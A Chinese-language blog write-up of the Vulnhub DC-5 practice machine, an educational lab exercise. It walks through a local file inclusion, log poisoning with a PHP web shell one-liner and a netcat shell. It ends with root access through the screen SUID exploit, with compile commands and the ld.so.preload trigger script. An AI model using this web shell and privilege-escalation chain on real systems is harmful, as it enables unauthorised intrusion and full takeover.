<!DOCTYPE html>
<html>
  <!-- Html Head Tag-->
  <head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content>
  <meta name="author" content="ST0new">
  <!-- Open Graph Data -->
  <meta property="og:title" content="DC-5 复现">
  <meta property="og:description" content="一个ctfer，web渗透测试小白">
  <meta property="og:site_name" content="ST0new的小站">
  <meta property="og:type" content="article">
  <meta property="og:image" content="http://yoursite.com">
  
    <link rel="alternate" href="/atom.xml" title="ST0new的小站" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  

  <!-- Site Title -->
  <title>ST0new的小站</title>

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="/css/bootstrap.min.css">
  <!-- Custom CSS -->
  
  <link rel="stylesheet" href="/css/style.light.css">

  <!-- Google Analytics -->
  

</head>

  <body>
    <!-- Page Header -->


<header class="site-header header-background" style="background-image: url(/img/default-banner-dark.jpg)">
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="page-title with-background-image">
          <p class="title">DC-5 复现</p>
          <p class="subtitle"></p>
        </div>
        <div class="site-menu with-background-image">
          <ul>
            
              <li>
                <a href="/">
                  
                  Home
                  
                </a>
              </li>
            
              <li>
                <a href="/archives">
                  
                  Archives
                  
                </a>
              </li>
            
              <li>
                <a href="https://github.com/ST0new/">
                  
                  Github
                  
                </a>
              </li>
            
              <li>
                <a href="mailto:<your-email-address>">
                  
                  Email
                  
                </a>
              </li>
            
          </ul>
        </div>
      </div>
    </div>
  </div>
</header>

<article>
  <div class="container typo">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="post-info text-muted">
          
            <!-- Author -->
            <span class="author info">By ST0new</span>
          
          <!-- Date -->
          <span class="date-time info">On
            <span class="date">2019-10-04</span>
            <span class="time">09:33:34</span>
          </span>
          
          <!--  Categories  -->
            <span class="categories info">Under 

<a href="/categories/靶机/">靶机</a>
</span>
          
        </div>
        <!-- Tags -->
        
          <div class="post-tags text-muted">
            Tags: 

<a class="tag" href="/tags/suid提权/">#suid提权</a> <a class="tag" href="/tags/本地文件包含/">#本地文件包含</a>


          </div>
        
        <!-- Post Main Content -->
        <div class="post-content">
          <p>[TOC]</p>
<h1 id="Vulnhub-之-DC-5-靶机复现"><a href="#Vulnhub-之-DC-5-靶机复现" class="headerlink" title="Vulnhub 之 DC-5 靶机复现"></a>Vulnhub 之 DC-5 靶机复现</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本靶机只做学习使用，不要将其利用于非法途径。</p>
<p>终于来到了倒数第二关，这一关将难度增加，所以我们需要借助搜索工具来帮助我们完成</p>
<h2 id="作者描述"><a href="#作者描述" class="headerlink" title="作者描述"></a>作者描述</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">DC-5是另一个专门建造的脆弱实验室，目的是获得渗透测试领域的经验。</span><br><span class="line"></span><br><span class="line">这个计划是为了让DC-5更上一层楼，所以这对初学者来说可能不太好，但对有中级或更好经验的人来说应该没问题。时间会证明一切(反馈也会证明)。</span><br><span class="line"></span><br><span class="line">据我所知，只有一个可利用的入口点可以进入(也没有SSH)。这个特定的入口点可能很难识别，但它就在那里。你需要寻找一些有点不寻常的东西(随着页面刷新而改变的东西)。这将有希望提供一些关于漏洞可能涉及到什么的想法。</span><br><span class="line"></span><br><span class="line">请注意，这里不涉及phpmailer漏洞。:-)</span><br><span class="line"></span><br><span class="line">这一挑战的最终目标是找到根，阅读唯一的旗帜。</span><br><span class="line"></span><br><span class="line">必须具备Linux技能和熟悉Linux命令行，就像一些基本渗透测试工具的经验一样。</span><br></pre></td></tr></table></figure>

<h2 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>复现环境</h2><p>kali： 192.168.248.130</p>
<p>DC-5 : 192.168.248.142</p>
<h2 id="开始复现"><a href="#开始复现" class="headerlink" title="开始复现"></a>开始复现</h2><ul>
<li>还是老套路扫网段，扫端口。拿到ip：192.168.248.142 开了两个端口：80和111</li>
</ul>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723183828.png" alt></p>
<ul>
<li><p>目录遍历</p>
<p>访问这些网站，试图寻找新的东西</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723195951.png" alt></p>
</li>
<li><p>查看网站</p>
<p>在concat.php 发现了输入栏</p>
<p>看到输入框就测测sql注入，xss</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723185409.png" alt></p>
<p>发现在url处返回了<a href="http://192.168.248.142/thankyou.php?firstname=1&amp;lastname=1&amp;country=other&amp;subject=1" target="_blank" rel="noopener">http://192.168.248.142/thankyou.php?firstname=1&amp;lastname=1&amp;country=other&amp;subject=1</a></p>
</li>
<li><p>文件包含</p>
<p>发现<code>foster 包含的copyright 20xx</code> 是会变化的</p>
<p>php在底部调用了footer.php 可能存在本地文件包含，尝试file=xxx测试</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723201552.png" alt></p>
</li>
</ul>
<ul>
<li><p>利用文件包含获取shell</p>
<p>由于网站会记录url日志，写一句话进去，访问获取shell</p>
<p><code>&lt;?php system($_GET[&#39;cmd&#39;]);?&gt;</code></p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723205437.png" alt></p>
<p>访问日志，并执行nc命令，获取到shell</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723205339.png" alt></p>
</li>
<li><p>借用提权工具</p>
<p>LinEnum.sh 获取到了提权操作</p>
<p>发现 guid 处存在可以文件</p>
<p>搜索发现提权思路</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723212545.png" alt></p>
<p>参考：<a href="https://www.exploit-db.com/exploits/41154" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/41154</a></p>
<p>先编译后上传执行</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gcc -fPIC -shared -ldl -o libhax.so libhax.c</span><br><span class="line">gcc -o rootshell rootshell.c</span><br></pre></td></tr></table></figure>

<p>通过wget上传</p>
<p>之后执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;[+] Now we create our /etc/ld.so.preload file...&quot;</span><br><span class="line">cd /etc</span><br><span class="line">umask 000 # because</span><br><span class="line">screen -D -m -L ld.so.preload echo -ne  &quot;\x0a/tmp/libhax.so&quot; # newline needed</span><br><span class="line">echo &quot;[+] Triggering...&quot;</span><br><span class="line">screen -ls # screen itself is setuid, so...</span><br><span class="line">/tmp/rootshell</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723214526.png" alt></p>
</li>
</ul>
<h2 id="查看flag"><a href="#查看flag" class="headerlink" title="查看flag"></a>查看flag</h2><p>在root目录下</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/23/20190723223011.png" alt></p>

        </div>
      </div>
    </div>
  </div>
</article>



    <!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <p class="copyright text-muted">
          Theme By <a target="_blank" href="https://github.com/levblanc">Levblanc.</a>
          Inspired By <a target="_blank" href="https://github.com/klugjo/hexo-theme-clean-blog">Clean Blog.</a>
        <p class="copyright text-muted">
          Powered By <a target="_blank" href="https://hexo.io/">Hexo.</a>
        </p>
      </div>
    </div>
  </div>
</footer>


    <!-- After Footer Scripts -->
<script src="/js/highlight.pack.js"></script>
<script>
  document.addEventListener("DOMContentLoaded", function(event) {
    var codeBlocks = Array.prototype.slice.call(document.getElementsByTagName('pre'))
    codeBlocks.forEach(function(block, index) {
      hljs.highlightBlock(block);
    });
  });
</script>

  </body>
</html>

